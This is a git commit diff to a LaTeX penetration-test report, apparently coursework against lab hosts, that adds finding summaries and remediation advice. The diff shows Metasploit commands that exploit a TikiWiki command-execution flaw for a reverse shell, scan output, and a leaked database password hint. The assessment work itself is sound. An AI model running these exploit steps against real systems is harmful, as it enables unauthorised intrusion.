add \newpage and missing summaries.

author: mo khan <mo@mokhan.ca> 2016-02-17 18:13:59 -0700
committer: mo khan <mo@mokhan.ca> 2016-02-17 18:13:59 -0700
commit: 81ecebb0bb032e6925029330197620ded206abc0 (patch)
tree: 22e26e4f4ee98abd888593070c070ba2b3aeed2f
parent: 9330f1764949a39deffd04552d4532760c9c62c7 (diff)
1 files changed, 36 insertions, 40 deletions
diff --git a/report/template.tex b/report/template.tex
index 8febbe0..d357f70 100644
--- a/report/template.tex
+++ b/report/template.tex
@@ -63,6 +63,8 @@ The scope of the assessment included penetration testing against the below syste
   \item ultimatelamp.sait230.ca (10.2.1.3)
 \end{itemize}
 
+The focus of the assessment was against vulnerable web applications and databases.
+
 \subsection{Methodology}
 
 The following methodology was used:
@@ -134,6 +136,7 @@ recommendations to remediate the issues identified.
     Medium & Vulnerable Wordpress Spreadsheet Plugin. & Disable vulnerable plugin or upgrade. \\ \hline
     High & Default Tomcat Installation & Change default tomcat installation. \\ \hline
     High & PHPMyAdmin root Access & Secure access to phpMyAdmin. \\ \hline
+    High & Tikiwiki command execution flaw & Command execution flaw allows users to run arbitrary code within the target host. \\ \hline
     \hline
   \end{tabular}
 \end{center}
@@ -507,8 +510,15 @@ Next I logged in to the wordpress site.
 \newpage
 \section{Default Tomcat Installation}
 
+\begin{description}
+  \item[Severity] High
+  \item[Impact] Start/Stop existing applications and/or upload malicious applications which can lead to full system compromise.
+  \item[Affected Resources/System] http://metasploitable.sait230.ca/wordpress
+  \item[Summary] The Tomcat installation on this host is allows for remote access using the default installation credentials.
+\end{description}
+
 \paragraph{Apache Tomcat}
-In the nikto scan we saw that the metasploitable box was using a default Apache
+In the nikto scan I saw that the metasploitable box was using a default Apache
 Tomcat installation:
 
 \begin{lstlisting}
@@ -564,7 +574,8 @@ ability to run shell commands on this host.
 
 \begin{enumerate}
   \item Change the default credentials for the Tomcat account.
-  \item Restrict access to the Tomcat manager.
+  \item Restrict access to the Tomcat manager by firewall rules.
+  \item Ensure only HTTPS access to the Tomcat manager.
 \end{enumerate}
 
 \paragraph{References}
@@ -629,45 +640,21 @@ databases, export databases, import databases as well as many other functions.
   \item[Severity] High
   \item[Impact] www-data level access to full system.
   \item[Affected Resources/System] http://ultimatelamp.sait230.ca/tikiwiki/
-  \item[Summary] Tikiwiki command execution flaw
+  \item[Summary] Tikiwiki command execution flaw allows users to run arbitrary code within the target host.
 \end{description}
 
 \paragraph{Tikiwiki}
 
-\begin{lstlisting}[language=Bash,basicstyle=\tiny]
-msf > search tikiwiki
-[-] Warning: database not connected or cache not built, falling back to slow search
-
-Matching Modules
-================
+The version of tikiwiki running on ultimatelamp.sait230.ca has a command execution
+flaw in the tiki-graph\_formula.php page. This vulnerability can be used to
+gain system level access to the host.
 
-   Name                                             Disclosure Date  Rank       Description
-   ----                                             ---------------  ----       -----------
-   auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     TikiWiki Information Disclosure
-   exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
-   exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
-   exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  TikiWiki jhot Remote Command Execution
-   exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  Tiki Wiki <= 8.3 unserialize() PHP Code Execution
+Metasploit has a module that can be used to gain access to the host via
+a reverse meterpreter shell. Below is a meterpreter session detailing
+how I was able to gain a shell on the ultimatelamp.sait230.ca host
 
+\begin{lstlisting}[language=Bash,basicstyle=\tiny]
 msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec 
-msf  exploit(tikiwiki_graph_formula_exec) > show options
-
-Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   RHOST                   yes       The target address
-   RPORT  80               yes       The target port
-   URI    /tikiwiki        yes       TikiWiki directory path
-   VHOST                   no        HTTP server virtual host
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Automatic
-
 msf  exploit(tikiwiki_graph_formula_exec) > set RHOST ultimatelamp.sait230.ca
 RHOST => ultimatelamp.sait230.ca
 msf  exploit(tikiwiki_graph_formula_exec) > exploit
@@ -822,6 +809,7 @@ Service detection performed. Please report any incorrect results at https://nmap
 Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
 \end{lstlisting}
 
+\newpage
 \subsection{metasploitable.sait230.ca}
 
 \begin{lstlisting}[language=bash]
@@ -853,7 +841,7 @@ PORT     STATE SERVICE              VERSION
 6667/tcp open  irc                  Unreal ircd
 8009/tcp open  ajp13                Apache Jserv (Protocol v1.3)
 8180/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
-\end{lstlistring}
+\end{lstlisting}
 
 I chose to spider the metasploitable website to analyze the full site locally 
 to try to identify and information leakage in the website.
@@ -869,14 +857,15 @@ on the downloaded source to try to find some keywords like password.
 \$ grep -rn password metasploitable.sait230.ca/
 \end{lstlisting}
 
-Here's one snippet that i discovered:
+Here's one snippet that I discovered:
 
 \begin{lstlisting}[language=bash]
 metasploitable.sait230.ca/mutillidae/index.php?do=toggle-security&page=user-info.php:2: \
 <!-- I think the database password is set to blank or perhaps samurai.
 \end{lstlisting}
 
-The above text shows then a client side html comment was left in the code that hints at a possible password for the database.
+The above text shows then a client side HTML comment was left in the code that hints 
+at a possible password for the database.
 
 Another example:
 
@@ -886,12 +875,12 @@ It is ok to put the password in HTML comments because no user will ever see
 \end{lstlisting}
 
 The above statement is incorrect. Serverside comments will be rendered on the server
-and will be ommitted by most templating engines when producing html. However, it will
-not strip out html comments. Html comments can be easily viewed by all browsers. Passwords
+and will be ommitted by most templating engines when producing HTML\@. However, it will
+not strip out HTML comments. HTML comments can be easily viewed by all browsers. Passwords
 and information that gives away details about the backend system should never be
 writtin in a code comment.
 
-Next, I opened up the file metasploitable.sait230.ca/mutillidae/index.php and 
+Next, I opened up the file metasploitable.sait230.ca/mutillidae/index.php and
 found the following code comment at the top of the HTML document.
 
 \begin{lstlisting}[language=HTML]
@@ -907,6 +896,7 @@ just making all this up. -->
 "http://www.w3.org/TR/19 99/REC-html401-19991224/loose.dtd">
 \end{lstlisting}
 
+\newpage
 \subsection{bwa.sait230.ca}
 
 \begin{lstlisting}[language=bash]
@@ -930,6 +920,7 @@ Nmap done: 1 IP address (1 host up) scanned in 11.26 seconds
 \end{lstlisting}
 
 
+\newpage
 \subsection{tomcat-apache.sait230.ca}
 
 \begin{lstlisting}[language=bash]
@@ -950,6 +941,7 @@ Service detection performed. Please report any incorrect results at http://nmap.
 Nmap done: 1 IP address (1 host up) scanned in 12.27 seconds
 \end{lstlisting}
 
+\newpage
 \subsection{ultimatelamp.sait230.ca}
 
 \begin{lstlisting}[language=bash]
@@ -978,6 +970,7 @@ Web Application vulnerabilities discovered
 
 \csvautotabular{discovery-webapp.csv}
 
+\newpage
 \subsection{Vulnerabilities for bwa.sait230.ca}
 
 nikto scan:
@@ -1021,6 +1014,7 @@ root@bt-was:/pentest/web/nikto# ./nikto.pl -host bwa.sait230.ca -p 80
 + 1 host(s) tested
 \end{lstlisting}
 
+\newpage
 \subsection{Vulnerabilities for metasploitable.sait230.ca}
 
 nikto scan:
@@ -1106,6 +1100,7 @@ The results from the nessus scan are below:
 	\label{fig:directory-listing}
 \end{figure}
 
+\newpage
 \subsection{Vulnerabilities for tomcat-apache.sait230.ca}
 nikto scan:
 
@@ -1163,6 +1158,7 @@ The results from the nessus scan are below:
 	\label{fig:nessus-tomcat}
 \end{figure}
 
+\newpage
 \subsection{Vulnerabilities for ultimatelamp.sait230.ca}
 nikto scan:
author	mo khan <mo@mokhan.ca>	2016-02-17 18:13:59 -0700
committer	mo khan <mo@mokhan.ca>	2016-02-17 18:13:59 -0700
commit	81ecebb0bb032e6925029330197620ded206abc0 (patch)
tree	22e26e4f4ee98abd888593070c070ba2b3aeed2f
parent	9330f1764949a39deffd04552d4532760c9c62c7 (diff)